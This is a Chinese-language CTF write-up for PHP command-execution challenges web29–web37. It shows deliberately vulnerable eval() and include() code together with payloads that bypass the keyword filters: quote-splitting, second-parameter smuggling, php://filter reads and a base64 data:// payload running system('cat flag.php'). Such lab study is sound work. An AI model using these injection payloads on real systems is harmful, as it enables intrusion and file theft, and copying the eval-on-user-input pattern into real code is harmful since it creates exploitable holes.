C
C
CTF-WriteUp
Search
⌃K

命令执行

web29

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
用''绕过过滤
echo `nl fl''ag.php`;
或者直接再起一个变量绕过关键词过滤:
/?c=system($_GET['a']);&a=nl flag.php;

web30

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
用''绕过过滤
echo `nl fl''ag.p''hp`;
或者同上,老套娃了。
?c=eval($_GET[a])?>&a=system('cat flag.php');

web31

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
同上题
?c=eval($_GET[a])?>&a=system('cat flag.php');
还看到了很多奇怪的姿势:
show_source(next(array_reverse(scandir(pos(localeconv())))));

web32

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
过滤了单引号和系统调用函数,之前用的方法就不能用了,用了php伪协议读取文件。
?c=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php
第一次知道eval()可以includefile,长知识,使用?>代替分号。

web33-36

题目
命令执行,需要经过严格的过滤。
解决方案
过滤双引号,前面的exp去掉双引号就行。
?c=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web37

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
一看就感觉是转base64读取代码
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
感觉这几题都是文件包含的知识点。